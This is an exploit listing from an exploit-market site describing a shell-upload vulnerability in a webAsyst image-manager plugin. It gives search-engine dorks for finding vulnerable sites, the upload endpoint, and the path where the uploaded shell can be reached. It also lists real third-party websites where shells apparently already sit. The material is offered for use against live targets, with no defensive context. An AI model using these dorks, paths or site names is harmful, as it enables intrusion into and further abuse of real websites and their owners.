[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

webAsyst Plugins ImageManager Shell Upload Vulnerability

Author
b3yaz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21496
Category
web applications
Date add
10-11-2013
Platform
windows
# Exploit Title: webAsyst Plugins ImageManager Shell Upload Vulnerability
# Exploit Author: Trickster & Default & b3yaz.Org
# Vendor Homepage: http://www.b3yaz.org/

Dork: inurl:/index.php?categoryID= site:**
Dork: Must google image search
http://hivan.ru/published/common/html/res/images/logo.gif


Shell Upload : 

http://127.0.0.1/published/common/html/xinha/plugins/ImageManager/manager.php

Uploaded Shell's Access Path :

http://127.0.0.1/published/common/html/xinha/plugins/ImageManager/demo_images/shell.php

Demo :

http://www.fiorella.ru/published/common/html/xinha/plugins/ImageManager/demo_images/b3yaz.gif.php
http://www.urarus.ru/published/common/html/xinha/plugins/ImageManager/demo_images/net.php

Greets to : ynR ! & Baypars & Metallanguid & T3kfurD4GLı & Cromber & All b3yaz.Org Members

#  0day.today [2024-10-06]  #